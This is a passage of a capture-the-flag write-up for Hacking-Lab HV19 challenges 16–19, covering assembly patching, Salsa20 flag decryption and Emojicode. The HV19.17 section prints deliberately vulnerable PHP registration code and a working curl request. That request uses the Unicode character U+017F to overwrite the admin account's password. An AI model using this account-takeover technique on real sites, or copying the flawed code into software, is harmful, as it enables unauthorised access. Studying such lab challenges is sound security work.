breakpoint, entering some input and inspecting the stack at the time of the call to this function, we can see that <code>dword ptr ss:[ebp+8]<\/code> contains the first number entered and <code>dword ptr ss:[ebp+0xc]<\/code> contains the second number. Because of the left instruction, <code>eax<\/code> already contains the first number. Accordingly we only have to add the instruction <code>add eax,dword ptr[ebp+0xc]<\/code> in order to add the second number to <code>eax<\/code>, which will hold the final result. Within <code>x64dbg<\/code> we can select the line of the first <code>nop<\/code> and hit <code>SPACE<\/code> to apply a patch to the binary:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/12\/16_04_patch.png\" width=\"900px\"\/>\n<br\/>\n<br\/>The patched implementation for add (<code>+<\/code>) now looks like this:\n<br\/><pre style=\"background-color:#000000;color:#00ff00;padding:6px;font-size:14px;line-height:18px;white-space:pre-wrap;\">enter 0,0\nmov eax,dword ptr ss:[ebp+8]\nadd eax,dword ptr ss:[ebp+C]\nleave \nret 8<\/pre>\n<br\/>As we can see, the operation now works and we get already parts of the flag printed beneath the text fields:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/12\/16_05_add.png\" \/>\n<br\/>\n<br\/>The second operation to implement is sub (<code>-<\/code>):\n<br\/><pre style=\"background-color:#000000;color:#00ff00;padding:6px;font-size:14px;line-height:18px;white-space:pre-wrap;\">enter 0,0\nnop \nnop \nnop \nmov ecx,dword ptr ss:[ebp+C]\nnop \nnop \nleave<\/pre>\n<br\/>Again an instruction was left, which moves the second number to <code>ecx<\/code>. Accordingly we only need to move the first number to <code>eax<\/code> beforehand and subtract <code>ecx<\/code> from <code>eax<\/code> at the end:\n<br\/><pre style=\"background-color:#000000;color:#00ff00;padding:6px;font-size:14px;line-height:18px;white-space:pre-wrap;\">enter 0,0\nmov eax,dword ptr ss:[ebp+8]\nmov ecx,dword ptr ss:[ebp+C]\nsub eax,ecx\nleave \nret 8<\/pre>\n<br\/>The next instruction is mul (<code>*<\/code>):\n<br\/><pre style=\"background-color:#000000;color:#00ff00;padding:6px;font-size:14px;line-height:18px;white-space:pre-wrap;\">enter 0,0\nnop \nnop \nnop \nnop \nnop \nnop \nnop \nnop \nleave \nret 8<\/pre>\n<br\/>This time no instruction was left, but we already know from the previous operations, what to do: move to first number to <code>eax<\/code>, the second to <code>ecx<\/code> and then multiply both registers:\n<br\/><pre style=\"background-color:#000000;color:#00ff00;padding:6px;font-size:14px;line-height:18px;white-space:pre-wrap;\">enter 0,0\nmov eax,dword ptr ss:[ebp+8]\nmov ecx,dword ptr ss:[ebp+C]\nmul ecx\nleave \nret 8<\/pre>\n<br\/>The last operation is div (<code>\/<\/code>):\n<br\/><pre style=\"background-color:#000000;color:#00ff00;padding:6px;font-size:14px;line-height:18px;white-space:pre-wrap;\">enter 0,0\nnop \nnop \nnop \nnop \nnop \nnop \nnop \nnop \nnop \nnop \nleave \nret 8<\/pre>\n<br\/>The first two instructions stay the same. Before the <code>div<\/code> instruction we additionally zero out <code>edx<\/code> (<code>xor edx, edx<\/code>) since <code>div<\/code> divides <code>EDX:EAX<\/code> by the value within the given register:\n<br\/><pre style=\"background-color:#000000;color:#00ff00;padding:6px;font-size:14px;line-height:18px;white-space:pre-wrap;\">enter 0,0\nmov eax,dword ptr ss:[ebp+8]\nmov ecx,dword ptr ss:[ebp+C]\nxor edx, edx\ndiv ecx\nleave <\/pre>\n<br\/>After all missing implementations are fixed, the flag is displayed:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/12\/16_06_flag.png\" \/>\n<br\/>\n<br\/>The flag is <span class=\"spanFlag\">HV19{B0rked_Flag_Calculat0r}<\/span>.\n<br\/><br\/>\n<hr id=\"chlgHV19.17\"\/><span style=\"float:right;\"><a href=\"\">return to overview &#x21E7;<\/a><\/span><h1>HV19.17 - Unicode&nbsp;Portal<\/h1>\n<table class=\"chlgTable\"><tbody><tr><td width=\"130\"><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/12\/ball_17.png\" \/><\/td><td style=\"color:#333333\">Author: scryh<\/td><\/tr><tr><td colspan=\"2\">Buy your special gifts online, but for the ultimative gift you have to become admin.\n<br\/>\n<br\/><span class=\"link\">http:\/\/whale.hacking-lab.com:8881\/<\/span>\n<br\/><\/td><\/tr><\/tbody><\/table>\n<br\/>Since the challenge was created by myself, I was really curious about how other people like it and the way they solve it. Unfortunately the live server was running a slightly different version of MySQL than I used to create the challenge, which made the intended solution not working at the beginning. This also enabled an unintended solution (see below), which is slightly different from the intended one. Despite this rusty start the challenge went as planned and I got quite a good feedback.\n<br\/>\n<br\/>The provided link within the challenge's description leads to <code>santa's unicode portal<\/code>:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/12\/17_01_page.png\" width=\"800px\"\/>\n<br\/>\n<br\/>On the <code>register<\/code> page a new account can be created:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/12\/17_02_register.png\" width=\"800px\"\/>\n<br\/>\n<br\/>Logging in with a freshly created account, the <code>symbols<\/code> page is accessible:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/12\/17_03_symbols.png\" width=\"800px\"\/>\n<br\/>\n<br\/>Also the authentication source code can be viewed:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/12\/17_04_code.png\" width=\"800px\"\/>\n<br\/>\n<br\/>The goal of the challenge is to get access to the <code>admin<\/code> page, which cannot be accessed by default users:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/12\/17_05_admin.png\" width=\"800px\"\/>\n<br\/>\n<br\/>In order to get access to the <code>admin<\/code> page, our username must be <code>santa<\/code>:\n<br\/><pre style=\"background-color:#000000;color:#00ff00;padding:6px;font-size:14px;line-height:18px;white-space:pre-wrap;\">\/**\n * Determines if the given user is admin.\n *\/\nfunction isAdmin($username) {\n  return ($username === 'santa');\n}<\/pre>\n<br\/>The user <code>santa<\/code> cannot be registered, because it already exists (with a strong password, which is not supposed to be guessed\/cracked\/bruteforced).\n<br\/>\n<br\/>Nevertheless the password of the user <code>santa<\/code> can be changed by evading the check made by the <code>isUsernameAvailable<\/code> function.\n<br\/>\n<br\/>This function converts the username to lowercase and determines if a binary equivalent username (lowercase) is already in the database:\n<br\/><pre style=\"background-color:#000000;color:#00ff00;padding:6px;font-size:14px;line-height:18px;white-space:pre-wrap;\">\/**\n * Determines if the given username is already taken.\n *\/\nfunction isUsernameAvailable($conn, $username) {\n  $usr = $conn-&gt;real_escape_string($username);\n  $res = $conn-&gt;query(\"SELECT COUNT(*) AS cnt FROM users WHERE LOWER(username) = BINARY LOWER('\".$usr.\"')\");\n  $row = $res-&gt;fetch_assoc();\n  return (int)$row['cnt'] === 0;<\/pre>\n<br\/>If a username is available, the function <code>registerUser<\/code> is called, which converts the username to uppercase and stores it in the database:\n<br\/><pre style=\"background-color:#000000;color:#00ff00;padding:6px;font-size:14px;line-height:18px;white-space:pre-wrap;\">\/**\n * Registers a new user.\n *\/\nfunction registerUser($conn, $username, $password) {\n  $usr = $conn-&gt;real_escape_string($username);\n  $pwd = password_hash($password, PASSWORD_DEFAULT);\n  $conn-&gt;query(\"INSERT INTO users (username, password) VALUES (UPPER('\".$usr.\"'),'\".$pwd.\"') ON DUPLICATE KEY UPDATE password='\".$pwd.\"'\");\n}<\/pre>\n<br\/>This can be exploited by leveraging the fact that certain unicode characters (the topic of the page should be a broad hint) end up as actual ASCII characters when being converted to lowercase or uppercase.\n<br\/>\n<br\/>Accordingly for example the unicode character <a href=\"https:\/\/www.compart.com\/en\/unicode\/U+017F\" rel=\"noopener noreferrer\" target=\"_blank\">U+017F<\/a> (UTF-8: <code>0xC5 0xBF<\/code>) ends up as an upper <code>S<\/code> when converted to uppercase.\n<br\/>\n<br\/>This means that we can register the username <code>%c5%bfanta<\/code>, which passes the check of <code>isUsernameAvailable<\/code>, because it does not equal <code>santa<\/code>. After being converted to uppercase by the <code>registerUser<\/code> function though, the username inserted in the database is <code>SANTA<\/code>, which means that effectively the password for the username <code>santa<\/code> is updated (<code>... ON DUPLICATE KEY UPDATE password ...<\/code>).\n<br\/>\n<br\/>Thus we only have to register the username <code>%c5%bfanta<\/code> and set a password we would like:\n<br\/><pre style=\"background-color:#000000;color:#00ff00;padding:6px;font-size:14px;line-height:18px;white-space:pre-wrap;\">root@kali:~\/hv19\/hv17# curl http:\/\/whale.hacking-lab.com:8881\/\/register.php -d 'username=%c5%bfanta&pwd=mySecretPwd&pwd2=mySecretPwd'\n&lt;!DOCTYPE html&gt;\n&lt;html&gt;\n...\n&lt;center&gt;\n&lt;h3&gt;Registration successful!&lt;\/h3&gt;\n&lt;h4&gt;You will be redirected to the login page ...&lt;\/h4&gt;\n&lt;\/center&gt;\n...\n<\/pre>\n<br\/>Now we can login with the username <code>santa<\/code> and the password <code>mySecretPwd<\/code> and access the admin page:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/12\/17_06_flag.png\" width=\"800px\"\/>\n<br\/>\n<br\/>The unintended, yet working solution on the MySQL version in place, is basically the same but registering the user <code>'santa '<\/code> (with a trailing space).\n<br\/>\n<br\/>The flag is <span class=\"spanFlag\">HV19{h4v1ng_fun_w1th_un1c0d3}<\/span>.\n<br\/><br\/>\n<hr id=\"chlgHV19.18\"\/><span style=\"float:right;\"><a href=\"\">return to overview &#x21E7;<\/a><\/span><h1>HV19.18 - Dance&nbsp;with&nbsp;me<\/h1>\n<table class=\"chlgTable\"><tbody><tr><td width=\"130\"><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/12\/ball_18.png\" \/><\/td><td style=\"color:#333333\">Author: hardlock<\/td><\/tr><tr><td colspan=\"2\">Santa had some fun and created todays present with a special dance. this is what he made up for you:\n<br\/><pre>096CD446EBC8E04D2FDE299BE44F322863F7A37C18763554EEE4C99C3FAD15<\/pre>Dance with him to recover the flag.\n<br\/>\n<br\/><span class=\"link\">HV19-dance.zip<\/span>\n<br\/><\/td><\/tr><\/tbody><\/table>\n<br\/>The provided zip archive contains a debian binary package:\n<br\/><pre style=\"background-color:#000000;color:#00ff00;padding:6px;font-size:14px;line-height:18px;white-space:pre-wrap;\">root@kali:~\/hv19\/18# unzip 93d0df60-3579-4672-8efc-f32327d3643f.zip\nArchive:  93d0df60-3579-4672-8efc-f32327d3643f.zip\n  inflating: dance\nroot@kali:~\/hv19\/18# file dance\ndance: Debian binary package (format 2.0)<\/pre>\n<br\/>The package can be extracted using <code>ar<\/code>:\n<br\/><pre style=\"background-color:#000000;color:#00ff00;padding:6px;font-size:14px;line-height:18px;white-space:pre-wrap;\">root@kali:~\/hv19\/18# ar -xv dance\nx - debian-binary\nx - control.tar.gz\nx - data.tar.lzma<\/pre>\n<br\/>The file <code>data.tar.lzma<\/code> contains the actual binary, which is a <code>Mach-O binary<\/code>:\n<br\/><pre style=\"background-color:#000000;color:#00ff00;padding:6px;font-size:14px;line-height:18px;white-space:pre-wrap;\">root@kali:~\/hv19\/18# tar -xvf data.tar.lzma\n.\n.\/usr\nusr\/bin\nusr\/bin\/dance\nroot@kali:~\/hv19\/18# file usr\/bin\/dance\nusr\/bin\/dance: Mach-O universal binary with 3 architectures: [armv7:Mach-O armv7 executable, flags:&lt;NOUNDEFS|DYLDLINK|TWOLEVEL|PIE&gt;] [arm64:Mach-O 64-bit arm64 executable, flags:&lt;NOUNDEFS|DYLDLINK|TWOLEVEL|PIE&gt;] [arm64:Mach-O 64-bit arm64 executable, flags:&lt;NOUNDEFS|DYLDLINK|TWOLEVEL|PIE&gt;]<\/pre>\n<br\/>The binary can be analyzed using <code>ghidra<\/code>:\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/12\/18_01_ghidra.png\" width=\"900px\"\/>\n<br\/>\n<br\/>Within the <code>main<\/code> function the user is prompted to enter the flag. The input entered is then passed along with some other parameters to a function called <code>_dance<\/code>. Within this function <code>_dance_block<\/code> is called, which in turn calls <code>_dance_words<\/code>. At the end of the <code>main<\/code> function the obviously encrypted input is printed in hex. Since the challenge description provides a hex value, this is probably the encrypted flag.\n<br\/>\n<br\/>By googling for the value <code>0x79622d32<\/code> taken from within the function <code>_dance_block<\/code> I found implementation of the <a href=\"https:\/\/en.wikipedia.org\/wiki\/Salsa20\" rel=\"noopener noreferrer\" target=\"_blank\">Salsa20<\/a> algorithm, which uses this value as a constant. In combination with the name of the challenge and the name of the functions this makes perfect sense.\n<br\/>\n<br\/>By default Salsa20 uses a 32 byte key and a 8 byte nonce. If the binary encrypts the input using this algorithm, we just need to get the key and nonce from it and decrypt the encrypted flag from the challenge's description.\n<br\/>\n<br\/>Using <a href=\"https:\/\/pycryptodome.readthedocs.io\/en\/latest\/src\/cipher\/salsa20.html\" rel=\"noopener noreferrer\" target=\"_blank\">PyCryptodome<\/a> for python we can try to decrypt the flag using the key and nonce from the binary.\n<br\/>\n<br\/>Finding the nonce was quite easy, since it is passed as the last argument to <code>_dance<\/code>:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/12\/18_02_nonce.png\" width=\"400px\"\/>\n<br\/>\n<br\/>The key can also be read from ghidra or by using <code>radare2<\/code>. The first 32 bytes within the <code>__const<\/code> section are the key:\n<br\/><pre style=\"background-color:#000000;color:#00ff00;padding:6px;font-size:14px;line-height:18px;white-space:pre-wrap;\">[0x0000bda2]&gt; iS\n[Sections]\nNm Paddr       Size Vaddr      Memsz Perms Name\n00 0x0000ba40  1180 0x0000ba40  1180 -r-x 0.__TEXT.__text\n01 0x0000bedc    96 0x0000bedc    96 -r-x 1.__TEXT.__picsymbolstub4\n02 0x0000bf3c   108 0x0000bf3c   108 -r-x 2.__TEXT.__stub_helper\n03 0x0000bfa8    64 0x0000bfa8    64 -r-x 3.__TEXT.__const\n04 0x0000bfe8    23 0x0000bfe8    23 -r-x 4.__TEXT.__cstring\n05 0x0000c000    12 0x0000c000    12 -rw- 5.__DATA.__nl_symbol_ptr\n06 0x0000c00c    24 0x0000c00c    24 -rw- 6.__DATA.__la_symbol_ptr\n07 0x0000c024     8 0x0000c024     8 -rw- 7.__DATA.__objc_imageinfo\n08 0x0000c02c     4 0x0000c02c     4 -rw- 8.__DATA.__data\n\n[0x0000bda2]&gt; px 100 @ 0x0000bfa8\n- offset -   0 1  2 3  4 5  6 7  8 9  A B  C D  E F  0123456789ABCDEF\n0x0000bfa8  0320 6346 61b6 3caf aa76 c27e ea00 b59b  . cFa.&lt;..v.~....\n0x0000bfb8  fb2f 7097 214f d04c b257 ac29 04ef ee46  .\/p.!O.L.W.)...F\n0x0000bfc8  7973 0ff4 ec0c 406b fd91 c91f e704 00a8  ys....@k........\n0x0000bfd8  adf1 6c63 456a 5ef1 ed9d 7946 9da2 a0b5  ..lcEj^...yF....\n0x0000bfe8  496e 7075 7420 796f 7572 2066 6c61 673a  Input your flag:\n0x0000bff8  2000 2530 3258 0000 0000 0000 0000 0000   .%02X..........\n0x0000c008  0000 0000                                ....\n[0x0000bda2]&gt; pc 32 @ 0x0000bfa8\n#define _BUFFER_SIZE 32\nconst uint8_t buffer[32] = {\n  0x03, 0x20, 0x63, 0x46, 0x61, 0xb6, 0x3c, 0xaf, 0xaa, 0x76,\n  0xc2, 0x7e, 0xea, 0x00, 0xb5, 0x9b, 0xfb, 0x2f, 0x70, 0x97,\n  0x21, 0x4f, 0xd0, 0x4c, 0xb2, 0x57, 0xac, 0x29, 0x04, 0xef,\n  0xee, 0x46\n};\n<\/pre>\n<br\/>Using these values we can actually decrypt the flag with the following python script:\n<br\/><pre style=\"background-color:#000000;color:#00ff00;padding:6px;font-size:14px;line-height:18px;white-space:pre-wrap;\">#!\/usr\/bin\/env python\n\nfrom Crypto.Cipher import Salsa20\nimport struct\n\nn = struct.pack('&lt;Q', 0xb132d0a8e78f4511)\nkey = ''.join(chr(x) for x in [0x03, 0x20, 0x63, 0x46, 0x61, 0xb6, 0x3c, 0xaf, 0xaa, 0x76,\n  0xc2, 0x7e, 0xea, 0x00, 0xb5, 0x9b, 0xfb, 0x2f, 0x70, 0x97,\n  0x21, 0x4f, 0xd0, 0x4c, 0xb2, 0x57, 0xac, 0x29, 0x04, 0xef,\n  0xee, 0x46])\n\nfl_encrypted = '096CD446EBC8E04D2FDE299BE44F322863F7A37C18763554EEE4C99C3FAD15'.decode('hex')\ncipher = Salsa20.new(key=key,nonce=n)\npt = cipher.encrypt(fl_encrypted)\nprint(pt)<\/pre>\n<br\/>Running the script yields the flag:\n<br\/><pre style=\"background-color:#000000;color:#00ff00;padding:6px;font-size:14px;line-height:18px;white-space:pre-wrap;\">root@kali:~\/hv19\/18# .\/decryptFlag.py\nHV19{Danc1ng_Salsa_in_ass3mbly}<\/pre>\n<br\/>The flag is <span class=\"spanFlag\">HV19{Danc1ng_Salsa_in_ass3mbly}<\/span>.\n<br\/><br\/>\n<hr id=\"chlgHV19.19\"\/><span style=\"float:right;\"><a href=\"\">return to overview &#x21E7;<\/a><\/span><h1>HV19.19 - &#x1F385;<\/h1>\n<table class=\"chlgTable\"><tbody><tr><td width=\"130\"><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/12\/ball_19.png\" \/><\/td><td style=\"color:#333333\">Author: M.<\/td><\/tr><tr><td colspan=\"2\">&#x1f3c1;&#x1f347;&#x1f3b6;&#x1f524;&#x1f407;&#x1f981;&#x1f35f;&#x1f5de;&#x1f370;&#x1f4d8;&#x1f956;&#x1f5bc;&#x1f6a9;&#x1f969;&#x1f635;&#x26fa;&#x2757;&#xfe0f;&#x1f950;&#x1f600;&#x1f349;&#x1f95e;&#x1f3c1;&#x1f449;&#xfe0f;&#x1f9c0;&#x1f34e;&#x1f36a;&#x1f680;&#x1f64b;&#x1f3d4;&#x1f34a;&#x1f61b;&#x1f414;&#x1f687;&#x1f537;&#x1f3b6;&#x1f4c4;&#x1f366;&#x1f4e9;&#x1f34b;&#x1f4a9;&#x2049;&#xfe0f;&#x1f344;&#x1f95c;&#x1f996;&#x1f4a3;&#x1f384;&#x1f968;&#x1f4fa;&#x1f96f;&#x1f4fd;&#x1f356;&#x1f420;&#x1f4d8;&#x1f444;&#x1f354;&#x1f355;&#x1f416;&#x1f32d;&#x1f377;&#x1f991;&#x1f374;&#x26ea;&#x1f927;&#x1f31f;&#x1f513;&#x1f525;&#x1f381;&#x1f9e6;&#x1f92c;&#x1f6b2;&#x1f514;&#x1f56f;&#x1f976;&#x2764;&#xfe0f;&#x1f48e;&#x1f4ef;&#x1f399;&#x1f39a;&#x1f39b;&#x1f4fb;&#x1f4f1;&#x1f50b;&#x1f608;&#x1f50c;&#x1f4bb;&#x1f42c;&#x1f5a8;&#x1f5b1;&#x1f5b2;&#x1f4be;&#x1f4bf;&#x1f9ee;&#x1f3a5;&#x1f39e;&#x1f50e;&#x1f4a1;&#x1f526;&#x1f3ee;&#x1f4d4;&#x1f4d6;&#x1f3d9;&#x1f601;&#x1f4a4;&#x1f47b;&#x1f6f4;&#x1f4d9;&#x1f4da;&#x1f953;&#x1f4d3;&#x1f6e9;&#x1f4dc;&#x1f4f0;&#x1f602;&#x1f347;&#x1f695;&#x1f516;&#x1f3f7;&#x1f4b0;&#x26f4;&#x1f4b4;&#x1f4b8;&#x1f681;&#x1f976;&#x1f4b3;&#x1f60e;&#x1f58d;&#x1f68e;&#x1f973;&#x1f4dd;&#x1f4c1;&#x1f5c2;&#x1f974;&#x1f4c5;&#x1f4c7;&#x1f4c8;&#x1f4c9;&#x1f4ca;&#x1f512;&#x26c4;&#x1f330;&#x1f577;&#x23f3;&#x1f4d7;&#x1f528;&#x1f6e0;&#x1f9f2;&#x1f427;&#x1f691;&#x1f9ea;&#x1f40b;&#x1f9ec;&#x1f52c;&#x1f52d;&#x1f4e1;&#x1f92a;&#x1f692;&#x1f489;&#x1f48a;&#x1f6cf;&#x1f6cb;&#x1f6bd;&#x1f6bf;&#x1f9f4;&#x1f9f7;&#x1f369;&#x1f9f9;&#x1f9fa;&#x1f63a;&#x1f9fb;&#x1f69a;&#x1f9ef;&#x1f607;&#x1f6ac;&#x1f5dc;&#x1f47d;&#x1f517;&#x1f9f0;&#x1f3bf;&#x1f6f7;&#x1f94c;&#x1f3af;&#x1f3b1;&#x1f3ae;&#x1f3b0;&#x1f3b2;&#x1f3ce;&#x1f975;&#x1f9e9;&#x1f3ad;&#x1f3a8;&#x1f9f5;&#x1f9f6;&#x1f3bc;&#x1f3a4;&#x1f941;&#x1f3ac;&#x1f3f9;&#x1f393;&#x1f37e;&#x1f490;&#x1f35e;&#x1f52a;&#x1f4a5;&#x1f409;&#x1f69b;&#x1f995;&#x1f510;&#x1f357;&#x1f920;&#x1f433;&#x1f9eb;&#x1f41f;&#x1f5a5;&#x1f421;&#x1f33c;&#x1f922;&#x1f337;&#x1f30d;&#x1f308;&#x2728;&#x1f38d;&#x1f316;&#x1f92f;&#x1f41d;&#x1f9a0;&#x1f98b;&#x1f92e;&#x1f30b;&#x1f3e5;&#x1f3ed;&#x1f5fd;&#x26f2;&#x1f4af;&#x1f301;&#x1f303;&#x1f68c;&#x1f4d5;&#x1f69c;&#x1f6c1;&#x1f6f5;&#x1f6a6;&#x1f6a7;&#x26f5;&#x1f6f3;&#x1f4ba;&#x1f6a0;&#x1f6f0;&#x1f386;&#x1f915;&#x1f480;&#x1f913;&#x1f921;&#x1f47a;&#x1f916;&#x1f44c;&#x1f44e;&#x1f9e0;&#x1f440;&#x1f634;&#x1f5a4;&#x1f524;&#x20;&#x2757;&#xfe0f;&#x27a1;&#xfe0f;&#x20;&#x3253;&#x20;&#x1f195;&#x1f36f;&#x1f41a;&#x1f522;&#x1f346;&#x1f438;&#x2757;&#xfe0f;&#x27a1;&#xfe0f;&#x20;&#x1f58d;&#x1f195;&#x32b7;&#x20;&#x1f502;&#x20;&#x2318;&#x20;&#x1f195;&#x23e9;&#x23e9;&#x20;&#x1f414;&#x1f368;&#x1f346;&#x2757;&#xfe0f;&#x20;&#x1f414;&#x3253;&#x2757;&#xfe0f;&#x2757;&#xfe0f;&#x20;&#x1f347;&#x20;&#x2318;&#x20;&#x27a1;&#xfe0f;&#x1f43d;&#x20;&#x32b7;&#x20;&#x1f43d;&#x20;&#x3253;&#x20;&#x2318;&#x2757;&#xfe0f;&#x2757;&#xfe0f;&#x1f349;&#x20;&#x1f3b6;&#x1f524;&#x1f374;&#x1f399;&#x1f996;&#x1f4fa;&#x1f349;&#x1f4d8;&#x1f356;&#x1f4dc;&#x1f514;&#x1f31f;&#x1f991;&#x2764;&#xfe0f;&#x1f4a9;&#x1f50b;&#x2764;&#xfe0f;&#x1f514;&#x1f349;&#x1f4e9;&#x1f39e;&#x1f3ee;&#x1f31f;&#x1f4be;&#x26ea;&#x1f4fa;&#x1f96f;&#x1f973;&#x1f524;&#x20;&#x2757;&#xfe0f;&#x27a1;&#xfe0f;&#x20;&#x1f15c;&#x20;&#x1f3b6;&#x1f524;&#x1f490;&#x1f421;&#x1f9f0;&#x1f3b2;&#x1f913;&#x1f69a;&#x1f9e9;&#x1f921;&#x1f524;&#x20;&#x2757;&#xfe0f;&#x27a1;&#xfe0f;&#x20;&#x1f17c;&#x20;&#x1f600;&#x20;&#x1f524;&#x20;&#x1f512;&#x20;&#x27a1;&#xfe0f;&#x20;&#x1f385;&#x1f3fb;&#x2049;&#xfe0f;&#x20;&#x27a1;&#xfe0f;&#x20;&#x1f384;&#x1f6a9;&#x20;&#x1f524;&#x2757;&#xfe0f;&#x1f4c7;&#x1f52a;&#x20;&#x1f195;&#x20;&#x1f521;&#x20;&#x1f442;&#x1f3fc;&#x2757;&#xfe0f;&#x1f414;&#x1f368;&#x1f346;&#x2757;&#xfe0f;&#x1f414;&#x1f368;&#x1f44e;&#x1f346;&#x2757;&#xfe0f;&#x2757;&#xfe0f;&#x2757;&#xfe0f;&#x20;&#x27a1;&#xfe0f;&#x20;&#x1f13c;&#x20;&rarrhk;&#xfe0f;&#x1f414;&#x1f13c;&#x2757;&#xfe0f;&#x1f64c;&#x20;&#x1f414;&#x1f368;&#x1f346;&#x2757;&#xfe0f;&#x1f347;&#x1f92f;&#x1f407;&#x1f4bb;&#x1f524;&#x1f44e;&#x1f524;&#x2757;&#xfe0f;&#x1f349;&#x20;&#x2623;&#xfe0f;&#x1f347;&#x1f195;&#x1f9e0;&#x1f195;&#x1f414;&#x1f15c;&#x2757;&#xfe0f;&#x2757;&#xfe0f;&#x27a1;&#xfe0f;&#x20;&check;&#x1f502;&#x20;&#x2318;&#x20;&#x1f195;&#x23e9;&#x23e9;&#x1f414;&#x1f368;&#x1f346;&#x2757;&#xfe0f;&#x1f414;&#x1f15c;&#x2757;&#xfe0f;&#x2757;&#xfe0f;&#x1f347;&#x1f43d;&#x20;&#x32b7;&#x20;&#x1f43d;&#x20;&#x1f15c;&#x20;&#x2318;&#x2757;&#xfe0f;&#x2757;&#xfe0f;&#x20;&#x27a1;&#xfe0f;&#x20;&#x2303;&#x1f43d;&#x20;&#x1f13c;&#x20;&#x2318;&#x20;&#x1f6ae;&#x1f414;&#x1f13c;&#x2757;&#xfe0f;&#x2757;&#xfe0f;&#x27a1;&#xfe0f;&#x20;&Hat;&#x1f4a7;&#x1f37a;&#x2303;&#x2796;&#x1f414;&#x3253;&#x2757;&#xfe0f;&#x2797;&#x1f414;&#x1f368;&#x1f44e;&#x1f44d;&#x1f346;&#x2757;&#xfe0f;&#x2757;&#xfe0f;&#x274c;&Hat;&#x274c;&#x1f4a7;&#x2318;&#x2757;&#xfe0f;&#x27a1;&#xfe0f;&#x20;&#x2388;&#x20;&rarrhk;&#xfe0f;&#x20;&#x2318;&#x20;&#x25c0;&#x20;&#x1f414;&#x1f17c;&#x2757;&#xfe0f;&#x1f91d;&#x274e;&#x1f37a;&#x1f43d;&#x20;&#x32b7;&#x20;&#x1f43d;&#x20;&#x1f17c;&#x20;&#x2318;&#x2757;&#xfe0f;&#x2757;&#xfe0f;&#x2796;&#x20;&#x1f91c;&#x1f91c;&#x20;&#x1f414;&#x1f15c;&#x2757;&#xfe0f;&#x2795;&#x1f414;&#x1f15c;&#x2757;&#xfe0f;&#x2796;&#x1f414;&#x1f13c;&#x2757;&#xfe0f;&#x2796;&#x1f414;&#x1f17c;&#x2757;&#xfe0f;&#x2795;&#x1f414;&#x1f368;&#x1f44d;&#x1f346;&#x2757;&#xfe0f;&#x1f91b;&#x2716;&#x1f414;&#x1f368;&#x1f44e;&#x1f44e;&#x1f44e;&#x1f346;&#x2757;&#xfe0f;&#x1f91b;&#x20;&#x1f64c;&#x20;&#x1f522;&#x2388;&#x2757;&#xfe0f;&#x2757;&#xfe0f;&#x1f347;&#x20;&#x1f92f;&#x1f407;&#x1f4bb;&#x1f524;&#x1f44e;&#x1f524;&#x2757;&#xfe0f;&#x1f349;&#x270d;&check;&#x20;&#x2388;&#x20;&#x2318;&#x20;&#x1f414;&#x1f368;&#x1f44e;&#x1f346;&#x2757;&#xfe0f;&#x2757;&#xfe0f;&#x1f349;&#x1f521;&#x1f195;&#x1f4c7;&#x1f9e0;&check;&#x20;&#x1f414;&#x1f15c;&#x2757;&#xfe0f;&#x2757;&#xfe0f;&#x2757;&#xfe0f;&#x27a1;&#xfe0f;&#x20;&#x2318;&rarrhk;&#xfe0f;&#x2318;&#x20;&#x1f64c;&#x20;&#x1f937;&zwj;&female;&#xfe0f;&#x1f347;&#x1f92f;&#x1f407;&#x1f4bb;&#x1f524;&#x1f44e;&#x1f524;&#x2757;&#xfe0f;&#x1f349;&#x1f600;&#x1f37a;&#x2318;&#x2757;&#xfe0f;&#x1f349;&#x20;&#x1f349;<\/td><\/tr><\/tbody><\/table>\n<br\/>The challenge description only contains the above unicode smileys. At first it reminded me of the <a href=\"https:\/\/devel0pment.de\/?p=461#chlg17\" rel=\"noopener noreferrer\" target=\"_blank\">Space Invaders challenge<\/a> from Hacky Easter 2018. Though there are much more smileys in this challenge. A bit of googling finally revealed that it is actually a program for <a href=\"https:\/\/www.emojicode.org\/\" rel=\"noopener noreferrer\" target=\"_blank\">Emojicode<\/a>.\n<br\/>\n<br\/>Prebuilt binaries of the Emojicode compiler can be downloaded <a href=\"https:\/\/github.com\/emojicode\/emojicode\/releases\" rel=\"noopener noreferrer\" target=\"_blank\">here<\/a>. After saving the smileys to a file called <code>day19.emojic<\/code>, we can compile it using <code>emojicodec<\/code>:\n<br\/><pre style=\"background-color:#000000;color:#00ff00;padding:6px;font-size:14px;line-height:18px;white-space:pre-wrap;\">root@kali:~\/hv19\/19\/Emojicode-1.0-beta.1-Linux-x86_64# .\/emojicodec ..\/day19.emojic \n..\/day19.emojic:1:297: &#9888;&#65039;  warning: Type is ambiguous without more context.\n...<\/pre>\n<br\/>The compiler creates an ELF file called <code>day19<\/code>:\n<br\/><pre style=\"background-color:#000000;color:#00ff00;padding:6px;font-size:14px;line-height:18px;white-space:pre-wrap;\">root@kali:~\/hv19\/19# file day19\nday19: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter \/lib64\/ld-linux-x86-64.so.2, BuildID[sha1]=7bf6c5daf4f8a5e185a8db0956a125262dce3132, for GNU\/Linux 3.2.0, not stripped<\/pre>\n<br\/>When running the binary a few smileys are displayed and we are prompted to enter something. When for example entering 